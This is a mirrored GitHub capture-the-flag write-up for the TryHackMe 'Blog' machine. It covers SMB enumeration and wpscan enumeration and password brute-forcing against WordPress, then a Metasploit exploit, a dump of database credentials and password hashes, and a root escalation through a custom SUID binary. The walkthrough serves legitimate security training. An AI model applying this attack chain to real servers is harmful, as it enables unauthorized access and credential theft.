Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-10 06:34:17 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/TryHackMe/Blog.md
AbdullahRizwan101 f63b9a4d37
Add files via upload
2020-11-12 02:57:42 +05:00

375 lines
15 KiB
Markdown
Raw Blame History

# TryHackMe-Blog
## NMAP
```
Nmap scan report for 10.10.62.12
Host is up (0.17s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
| 256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
|_ 256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.0
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Billy Joel's IT Blog – The IT blog
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: blog
| NetBIOS computer name: BLOG\x00
| Domain name: \x00
| FQDN: blog
|_ System time: 2020-11-11T18:34:52+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-11T18:34:52
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds
```
## PORT 139/445 (SMB)
We know that there are smb shares on this box so let's see which shares we can access
<img src="https://imgur.com/mG2Ix1R.png"/>
Let's grab the two photos from here and save it on our local machine
```
smb: \> get Alice-White-Rabbit.jpg
getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (34.8 KiloBytes/sec) (average 34.8 KiloBytes/sec)
smb: \> get check-this.png
getting file \check-this.png of size 3082 as check-this.png (4.5 KiloBytes/sec) (average 22.3 KiloBytes/sec)
smb: \>
```
Now we will see that there is a qr-image so use `zbarimg` to see what text we get from it
<img src="https://imgur.com/bWgCvyw.png"/>
```
root@kali:~/TryHackMe/Medium/Blog# zbarimg check-this.png
QR-Code:https://qrgo.page.link/M6dE
```
We will get a link that points to a video on youtube `Billy Joel - We Didn't Start the Fire (Official Video)` .
This seems like a rabbithole ....
```
root@kali:~/TryHackMe/Medium/Blog# steghide --extract -sf Alice-White-Rabbit.jpg
Enter passphrase:
wrote extracted data to "rabbit_hole.txt".
root@kali:~/TryHackMe/Medium/Blog# cat rabbit_hole.txt
You've found yourself in a rabbit hole, friend.
root@kali:~/TryHackMe/Medium/Blog#
```
And I was right being in the wrong path :D
## PORT 80
Moving on to web page
<img src="https://imgur.com/gGmGdj0.png"/>
<img src="https://imgur.com/X5bNz91.png"/>
Now your seeing this page like this because we have to add `blog.thm` into our `/etc/hosts/`
<img src="https://imgur.com/HfkqgW6.png"/>
Now it's loading properly
Looking at `robots.txt`
<img src="https://imgur.com/wHVSCs6.png"/>
I found a wordpress login page
<img src="https://imgur.com/04CGcge.png"/>
## Gobuster
`gobuster dir -u http://blog.thm -w /usr/share/wordlists/big.txt`
```
2020/11/11 23:56:33 Starting gobuster
===============================================================
/! (Status: 301)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/0 (Status: 301)
/0000 (Status: 301)
/2020 (Status: 301)
/admin (Status: 302)
/asdfjkl; (Status: 301)
/atom (Status: 301)
/dashboard (Status: 302)
/embed (Status: 301)
/favicon.ico (Status: 200)
/feed (Status: 301)
/fixed! (Status: 301)
Progress: 9204 / 20470 (44.96%
```
I didn't find anything interesting with gobuster so doing something with wordpress login page is the only way in
## WPSCAN
I used `wpscan` to enumerate for users and wordpress version
```
oot@kali:~/TryHackMe/Medium/Blog# wpscan -e --url 10.10.62.12
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.4
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.62.12/ [10.10.62.12]
[+] Started: Thu Nov 12 00:15:15 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://10.10.62.12/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.62.12/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
[i] User(s) Identified:
[+] bjoel
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.10.62.12/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] kwheel
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.10.62.12/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Karen Wheeler
| Found By: Rss Generator (Aggressive Detection)
[+] Billy Joel
| Found By: Rss Generator (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Thu Nov 12 00:17:18 2020
[+] Requests Done: 3086
[+] Cached Requests: 30
[+] Data Sent: 762.895 KB
[+] Data Received: 1.192 MB
[+] Memory used: 230.801 MB
[+] Elapsed time: 00:02:03
```
And I found two users `bjoel` and `kwheel` lets put this in a text file bruteforce thier passwords
```
wpscan --url http://blog.thm -U users.txt -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.4
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://blog.thm/ [10.10.62.12]
[+] Started: Thu Nov 12 00:27:33 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://blog.thm/robots.txt
| Interesting Entries:
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <=======================================================================> (21 / 21) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - kwheel / cutiepie1
Trying bjoel / heaven1 Time: 00:07:54 < > (6030 / 28691649) 0.02%
```
It took some time but we got `khweel`'s passwords
<img src="https://imgur.com/DWdyc3o.png"/>
And now we logged in as `khweel` in wordpress
Then I did a litte resarch on goole if there's an exploit available for `wordpress 5.0`
<img src="https://imgur.com/iYBp3s0.png"/>
<img src="https://imgur.com/Sv1YLJr.png"/>
So there's an exploit available for it on `metasploit`
<img src="https://imgur.com/ujtxWM3.png"/>
You could also search for it on `searchsploit` and it's going to show up as it's on `exploit-db`
<img src="https://imgur.com/e1z0Glb.png"/>
But I will be using metasploit because a tool is available for you why not use it :D
<img src="https://cdn.discordapp.com/attachments/522158539129618453/776178719538282526/Screenshot_2020-11-12_01-14-49.png"/>
I tried to use it but it kept failing, after quite sometime and restarted metasploit and then the exploit worked
<img src="https://imgur.com/lKwtShW.png"/>
I didn't find anythin in `bjoel`'s home directory I quickly ran `linpeas`
<img src="https://imgur.com/jzebLi2.png"/>
<img src="https://imgur.com/Uud4GIW.png"/>
These were the things I found out of linpeas
```
define('DB_NAME', 'blog');
define('DB_USER', 'wordpressuser');
define('DB_PASSWORD', 'LittleYellowLamp90!@');
define('DB_HOST', 'localhost');
```
Now a mysql database must be ruuning on localhost so lets try to login with these credentials
<img src="https://imgur.com/8rfshh6.png"/>
As we can see `DB_NAME` is `blog`
```
mysql> use blog
use blog
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-----------------------+
| Tables_in_blog |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql>
```
I ran command to select all entries in `wp_users`
```
mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+
| 1 | bjoel | $P$BjoFHe8zIyjnQe/CBvaltzzC6ckPcO/ | bjoel | nconkl1@outlook.com | | 2020-05-26 03:52:26 | | 0 | Billy Joel |
| 3 | kwheel | $P$BedNwvQ29vr1TPd80CDl6WnHyjr8te. | kwheel | zlbiydwrtfjhmuuymk@ttirv.net | | 2020-05-26 03:57:39 | | 0 | Karen Wheeler |
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+
```
Let's try cracking these hashes
<img src="https://imgur.com/OeLblO1.png"/>
But this was useless as we already got that password
<img src="https://imgur.com/bwcmDWv.png"/>
I then tried to run `/usr/sbin/checker` and it looked like it is customized
<img src="https://imgur.com/PjTWprr.png"/>
This looks like Buffer Overflow exploitation
<img src="https://imgur.com/DAFXCNS.png"/>
This tells that there's variable that is holds bash variable `$admin`'s value and it's comparing it wheather it's empty or not so you can see that on null value it would terminate so we need to set the value true
```
www-data@blog:/media$ export admin=true
export admin=true
www-data@blog:/media$ echo $admin
echo $admin
true
www-data@blog:/media$ /usr/sbin/checker
/usr/sbin/checker
root@blog:/media#
```
Reference in a new issue View git blame Copy permalink